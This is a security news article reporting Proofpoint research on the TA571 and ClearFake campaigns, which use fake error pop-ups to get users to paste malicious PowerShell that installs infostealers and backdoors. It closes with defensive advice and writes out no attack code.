Users at your organization may literally be copying and pasting malicious PowerShell scripts into their Windows terminals.
This seemingly farfetched scenario was described by Proofpoint researchers in a blog post Monday, with the authors describing two active campaigns to lure users into this drastic step.
“While we don’t have insight into how many of these attacks were successful, it is likely the threat actors are seeing a decent infection rate given that they keep using this technique,” Proofpoint Threat Researcher Selena Larson, who co-authored the blog post, told SC Media.
The first campaign was spotted in early March and attributed to initial access broker TA571, while the second campaign popped up in early April and has been tied to the “ClearFake” activity cluster. Both campaigns appeared to be ongoing at least as of early June.
ClearFake, TA571 abuse users’ trust in legitimate sites, programs
In both campaigns discovered by Proofpoint, the threat actors utilize prompts that claim an error has occurred and action is needed to continue browsing the website or file the target was trying to access. Said action involves copying code and pasting it into a Windows terminal to supposedly “install the root certificate” or “update the DNS cache.”
TA571 sent more than 100,000 spam emails to thousands of organizations over the past two months that include an HTML file resembling a Microsoft Word document or OneDrive file. The ClearFake campaign, on the other hand, sends out the phishing pop-ups from legitimate websites they have already compromised.
In either scenario, it is designed to appear to the end-user that the popup is coming from a trusted website or application. The legitimate websites used appeared to have been opportunistically compromised through vulnerabilities, such as vulnerable plugins, and included high traffic media sites and websites of small- and medium-sized businesses in addition to more obscure, low traffic sites, according to Larson.
Clicking one button on the prompt will copy a malicious PowerShell script onto the user’s clipboard, and following the prompt’s instructions to navigate to the Windows Powershell terminal and right-click will cause the script to be pasted and executed before the user can review it. Some versions of the campaign utilized the Windows Run terminal, which required fewer user steps, but allowed the user to see the contents of the script prior to running.
“It’s extremely important for organizations to train users on new and evolving threats across the landscape and ensure defense in depth – like flagging on non-administrative users executing PowerShell – to prevent exploitation at multiple steps in the attack chain,” Larson said.
PowerShell scripts install infostealers, backdoors
The PowerShell script copied from the ClearFake campaign popups was found to lead to infostealers including Lumma Stealer and Vidar Stealer, as well as cryptominers and a clipboard hijacker that replaces copied cryptocurrency addresses with the threat actor’s own address. In some cases, up to five distinct malware families were ultimately executed as a result of running one script.
The ClearFake malware avoids detection not only by having the script manually executed in the PowerShell terminal by the user, but also by doing checks for system temperature to avoid virtual machines and sandboxes, and by leveraging long nested attack chains that load content from various places and with various forms of obfuscation.
Final payloads for the TA571 campaign included DarkGate and NetSupport RAT, creating a backdoor that can be utilized by other cybercriminals who purchase initial access from TA571. Proofpoint said it has “high confidence” that infection by TA571 could ultimately facilitate ransomware attacks.
Despite the similarities between the campaigns, the Proofpoint researchers said they do not believe TA571 to be directly associated with the ClearFake activity cluster.
Proofpoint emphasized that the best defense against these attacks is for the attack chain to be stopped before the PowerShell is ever pasted.
“Organizations should train users to identify activity and report suspicious activity to their security teams. This is very specific training but can easily be integrated into an existing user training program,” the blog post concluded.
Larson also noted that restricting non-administrative users from executing PowerShell can mitigate the risk.